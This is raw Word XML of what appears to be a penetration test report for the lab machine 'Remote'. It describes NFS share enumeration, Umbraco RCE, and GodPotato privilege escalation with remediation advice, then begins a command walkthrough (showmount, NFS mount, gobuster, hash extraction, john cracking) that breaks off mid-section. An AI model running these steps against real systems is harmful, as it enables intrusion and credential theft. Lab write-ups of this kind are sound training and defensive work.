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31F0E" w14:textId="4084469F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bookmarkStart w:id="0" w:name="_Toc205375820"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:br/>
        <w:t>Target #1 – 10.129.230.172</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C736D" w14:textId="77777777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t>Vulnerability Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:br/>
        <w:t>The target was running Umbraco CMS version 7.12.4, which contains an authenticated Remote Code Execution (RCE) vulnerability due to insecure handling of XSLT transformations in the developer section.</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:br/>
        <w:t>Additionally, the target exposed an open NFS share (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>site_backups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">) accessible to everyone without authentication. This share contained sensitive web application files, including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>umbraco.sdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> with administrative credentials. These credentials were cracked and used to authenticate to the Umbraco </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>backoffice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>, where the RCE vulnerability was exploited to execute arbitrary commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD45A4B" w14:textId="08A66F4B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t>Vulnerability Fix:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Upgrade Umbraco CMS to the latest patched version that removes the vulnerable XSLT execution vector.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Disable public access to NFS shares or restrict access by IP and enforce authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Store sensitive data (such as CMS credentials) in a secure secrets store rather than in plain-text or reversible formats inside the web root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0998D3F4" w14:textId="77777777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t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:br/>
        <w:t>High – Full remote code execution and potential compromise of the entire host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0980BBE8" w14:textId="33FB3E33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  <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Steps to reproduce the attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Enumerate open ports; discover port 2049 (NFS) accessible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> -e &lt;target&gt; to identify the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>site_backups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> export.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">Mount the share locally with mount -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> &lt;target&gt;:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>site_backups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>nfs.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">Locate and extract the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>umbraco.sdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> database file from the mounted share.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Crack the stored admin credentials using a password cracking tool.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">Log in to Umbraco </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>backoffice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> at http://&lt;target&gt;/umbraco using the recovered credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Exploit the Umbraco 7.12.4 authenticated RCE via the vulnerable XSLT visualization feature to execute arbitrary commands on the host.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Establish a reverse shell to gain interactive access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB557D9" w14:textId="18DABFE5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t>Privilege Escalation –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F7EBE3" w14:textId="77777777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t>Vulnerability Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:br/>
        <w:t xml:space="preserve">The compromised account had the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>SeImpersonatePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> privilege enabled. This Windows privilege allows a user to impersonate access tokens for elevated accounts. Attackers can abuse this to execute processes as NT AUTHORITY\SYSTEM.</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:br/>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>GodPotato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> exploit, we were able to leverage this privilege to spawn a SYSTEM-level shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71208C39" w14:textId="3E68F930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t>Vulnerability Fix:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">Remove unnecessary privileges from service accounts, especially </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>SeImpersonatePrivilege.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Apply the latest Windows security patches that mitigate token impersonation privilege abuse.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Run services under least-privilege accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B05275" w14:textId="77777777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t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:br/>
        <w:t>High – Direct privilege escalation to the highest level on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D7FC6" w14:textId="18C646B0" w:rsidR="009D5EC7" w:rsidRPr="009D5EC7" w:rsidRDefault="009D5EC7" w:rsidP="009D5EC7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="009D5EC7">
        <w:lastRenderedPageBreak/>
        <w:t>Steps to reproduce the attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">Confirm </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>SeImpersonatePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> is enabled using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> /priv.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">Transfer the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>GodPotato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> executable to the target system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>Execute GodPotato.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve"> "cmd.exe" to spawn a SYSTEM shell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5EC7">
        <w:t xml:space="preserve">Verify elevated privileges with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5EC7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6B262A" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="009D5EC7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc151462880"/>
      <w:bookmarkStart w:id="2" w:name="_Toc92992245"/>
      <w:r>
        <w:t>ervice Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="55A3D5A6" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Port Scan Results</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8861" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="5" w:type="dxa"/>
          <w:right w:w="5" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1719"/>
        <w:gridCol w:w="7142"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C806EA" w14:paraId="11C06368" w14:textId="77777777" w:rsidTr="000E2153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2A95" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/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</w:pPr>
            <w:r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  <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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65179" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/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</w:pPr>
            <w:r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  <w:t>Ports Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C806EA" w14:paraId="4AD75EAD" w14:textId="77777777" w:rsidTr="000E2153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23518" w14:textId="40627779" w:rsidR="00C806EA" w:rsidRDefault="00AB5325" w:rsidP="00C806EA">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB5325">
              <w:rPr>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>10.129.230.172</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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C18FD" w14:textId="25EA3BA3" w:rsidR="00C806EA" w:rsidRPr="00AB5325" w:rsidRDefault="00C806EA" w:rsidP="00AB5325">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
            </w:pPr>
            <w:r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  <w:t>TCP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00AB5325" w:rsidRPr="00AB5325">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>21,80,111,135,139,445,2049,5985,47001,49664,49665,49666,49667,49678,49679,49680</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4357F89A" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRPr="00AE726A" w:rsidRDefault="00C806EA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b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:rtl/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE726A">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>As part of the enumeration process for the standalone (SA) machines, I developed a custom script to automate and standardize Nmap scans across multiple targets. The script is presented below and is included here for reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E8F90C" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRPr="00AE726A" w:rsidRDefault="00C806EA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b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:rtl/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE726A">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Please note: this script will be used consistently throughout the assessment for scanning SA machines. To avoid redundancy, I will not reintroduce the script in each machine’s section. Instead, I will refer back to this initial instance whenever applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF7DE1" w14:textId="3AF561BF" w:rsidR="005E7D6B" w:rsidRDefault="00C806EA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The python script called oscpSAscan.py – you can find it here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C806EA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
            <w:noProof/>
            <w:lang w:bidi="he-IL"/>
          </w:rPr>
          <w:t>oscpSAscan.py tool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244B5C55" w14:textId="31D39FFD" w:rsidR="00C806EA" w:rsidRDefault="001F2A6F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1F2A6F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1EAD8E05" wp14:editId="032E18E2">
            <wp:extent cx="5677692" cy="6763694"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13319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34A9" w14:paraId="47A03659" w14:textId="77777777" w:rsidTr="005734A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C8D6674" w14:textId="301ADA94" w:rsidR="005734A9" w:rsidRDefault="005734A9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5734A9">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>showmount -e 10.129.230.172</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51014105" w14:textId="3B508870" w:rsidR="001F2A6F" w:rsidRDefault="005734A9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5734A9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1B8F0B81" wp14:editId="59B90D08">
            <wp:extent cx="4001058" cy="905001"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="92494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49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34A9" w14:paraId="25F86C25" w14:textId="77777777" w:rsidTr="005734A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7914972C" w14:textId="3CA5C940" w:rsidR="005734A9" w:rsidRDefault="005734A9" w:rsidP="005734A9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5734A9">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>mkdir nfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C56FADF" w14:textId="7DF2A8D0" w:rsidR="005734A9" w:rsidRDefault="005734A9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5734A9">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61432E5E" wp14:editId="72952B59">
            <wp:extent cx="3972479" cy="543001"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6730231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313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34A9" w14:paraId="63FC4F9F" w14:textId="77777777" w:rsidTr="005734A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41E75D8A" w14:textId="0FBE6AE2" w:rsidR="005734A9" w:rsidRDefault="005734A9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5734A9">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>sudo mount -t nfs 10.129.230.172:/site_backups ./nfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="184A39B9" w14:textId="4450B338" w:rsidR="005734A9" w:rsidRDefault="008575A3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75A3">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F8427C" wp14:editId="0A813064">
            <wp:extent cx="4648849" cy="590632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1530423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235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D07" w14:paraId="184260F4" w14:textId="77777777" w:rsidTr="00DD6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FA42C40" w14:textId="006DA9D0" w:rsidR="00DD6D07" w:rsidRDefault="00DD6D07" w:rsidP="00DD6D07">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD6D07">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>gobuster dir -u http://10.129.230.172/ -w /home/kali/OSCPWordlists/big+common.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EF38070" w14:textId="35AD1241" w:rsidR="008575A3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rtl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4BA227BF" wp14:editId="26DBA5F3">
            <wp:extent cx="3762900" cy="171474"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="151400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6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D3E7" w14:textId="6D9D5414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rtl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47AF7395" wp14:editId="30F1FFC2">
            <wp:extent cx="5239481" cy="3429479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2728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8BDA" w14:textId="1B035710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6A2FBF13" wp14:editId="41BDD80A">
            <wp:extent cx="5943600" cy="1722755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="202886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61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D07" w14:paraId="2A97E13D" w14:textId="77777777" w:rsidTr="00DD6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C54294" w14:textId="1F8DE99D" w:rsidR="00DD6D07" w:rsidRDefault="00DD6D07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DD6D07">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>strings Umbraco.sdf | grep admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="004E1268" w14:textId="4D5D23F9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0939E9FE" wp14:editId="2563A997">
            <wp:extent cx="5943600" cy="1403350"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="46964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9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E19D" w14:textId="6B1FEE7A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>Cracked the hash with john:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCBC82E" w14:textId="0DBB9AC1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712C9149" wp14:editId="0F30F652">
            <wp:extent cx="5943600" cy="2099945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131447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6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977E" w14:textId="46913EDA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The hash: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6D07">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>b8be16afba8c314ad33d812f22a04991b90e2aaa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D07" w14:paraId="0BDB8EA6" w14:textId="77777777" w:rsidTr="00DD6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DC3CEA5" w14:textId="2D18D205" w:rsidR="00DD6D07" w:rsidRDefault="00DD6D07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DD6D07">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>john hash --wordlist=/usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66031681" w14:textId="5D0C6EE2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Cracked: </w:t>
      </w:r>
